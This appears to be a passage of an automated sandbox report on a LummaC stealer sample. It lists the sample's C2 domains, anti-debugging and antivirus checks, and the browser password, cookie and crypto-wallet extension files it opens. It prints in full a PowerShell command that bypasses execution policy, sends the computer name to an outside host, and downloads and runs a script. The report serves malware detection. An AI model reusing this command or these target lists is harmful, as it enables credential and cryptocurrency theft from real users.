              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00940EC8 mov eax, dword ptr fs:[00000030h]0_2_00940EC8
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00940EC9 mov eax, dword ptr fs:[00000030h]0_2_00940EC9
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010902E0 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_010902E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0108600F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0108600F
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0108C74F SetUnhandledExceptionFilter,0_2_0108C74F
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0107F1F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0107F1F2
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_0107F541 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0107F541

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: Active_Setup.exeString found in binary or memory: rabidcowse.shop
              Source: Active_Setup.exeString found in binary or memory: cloudewahsj.shop
              Source: Active_Setup.exeString found in binary or memory: tirepublicerj.shop
              Source: Active_Setup.exeString found in binary or memory: noisycuttej.shop
              Source: Active_Setup.exeString found in binary or memory: wholersorie.shop
              Source: Active_Setup.exeString found in binary or memory: framekgirus.shop
              Source: Active_Setup.exeString found in binary or memory: nearycrepso.shop
              Source: Active_Setup.exeString found in binary or memory: abruptyopsn.shop
              Source: Active_Setup.exeString found in binary or memory: cryofficesj.click
              Source: C:\Users\user\Desktop\Active_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; ;
              Source: C:\Users\user\Desktop\Active_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; ;Jump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_01092233
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: GetLocaleInfoA,0_2_010962C8
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_010928A1
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_01092AF9
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_01092DBF
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_010933EF
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_010932D8
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_01093487
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_010934FB
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0109378E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_010937F5
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_0108B6B7
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_010936CD
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_01093831
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: GetLocaleInfoA,0_2_01097C8B
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_01095F9D
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_01095E2A
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_01095E5E
              Source: C:\Users\user\Desktop\Active_Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01080A79 GetSystemTimeAsFileTime,__aulldiv,0_2_01080A79
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_010905DC __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_010905DC
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FC37A0 _memset,GetVersionExA,getsockopt,setsockopt,0_2_00FC37A0
              Source: C:\Users\user\Desktop\Active_Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1881263103.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Active_Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Active_Setup.exe PID: 7532, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: a%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520}
              Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wad
              Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p-store.json",".finger-print.fp","simple-storage.json","window-state.json"],
              Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\
              Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 1520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/E
              Source: Active_Setup.exe, 00000000.00000003.1881263103.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 1520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/E
              Source: Active_Setup.exe, 00000000.00000002.1934160913.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *ethereum*
              Source: Active_Setup.exe, 00000000.00000003.1860274897.0000000000BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: powershell.exe, 00000004.00000002.1945512728.0000000007550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
